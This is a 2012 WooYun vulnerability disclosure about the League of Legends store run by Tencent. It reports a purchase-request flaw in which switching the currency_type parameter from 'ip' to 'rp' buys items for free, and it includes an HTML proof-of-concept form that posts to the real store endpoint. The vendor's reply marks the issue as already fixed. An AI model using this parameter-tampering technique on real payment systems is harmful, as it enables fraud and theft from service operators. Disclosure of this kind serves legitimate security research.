当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05423

漏洞标题:英雄联盟刷钱漏洞

相关厂商:腾讯

漏洞作者: 锄禾哥

提交时间:2012-03-20 22:04

修复时间:2012-03-21 09:20

公开时间:2012-03-21 09:20

漏洞类型:网络设计缺陷/逻辑错误

危害等级:低

自评Rank:2

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-03-20: 细节已通知厂商并且等待厂商处理中
2012-03-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

英雄联盟刷钱漏洞,可以买任何商城东西不用钱

详细说明:

http://store.lol.qq.com/store/purchase/item
这个action中。
currency_type参数控制不严。
比如需要游戏金币买的东西,他原本的值为
currency_type=ip
他action判断currency_type中的类型的值的数据。
如果改成currency_type=rp.因为金币道具rp(人民币)是0,所以就会不花钱购买成功。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
</head>
<body>
<form action="http://store.lol.qq.com/store/purchase/item" method="post">
<input name="item_id" type="text" value="boosts_9" />
<br />
<input name="currency_type" type="text" value="ip" />
<br />
<input name="quantity" type="text" value="9" />
<br />
<input name="rp" type="text" value="" />
<br />
<input name="ip" type="text" value="" />
<br />
<input name="duration_type" type="text" value="PURCHASED" />
<br />
<input name="duration" type="text" value="10" />
<br />
<input name="submit" type="submit"  value="提交"/>
</form>
</body>
</html>


item_id即为传入需要买的道具ID

漏洞证明:

已经和量子工作室报告过了,已经修复,我来这里赚rank的,顺便和大家分享这个问题出现的原因。
顺便答应的RMB什么时候给啊 cry~~~

修复方案:

美国人知道

版权声明:转载请注明来源 锄禾哥@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-03-21 09:20

厂商回复:

非常感谢你的反馈,由于是历史漏洞且已经修复,故不给rank

最新状态:

暂无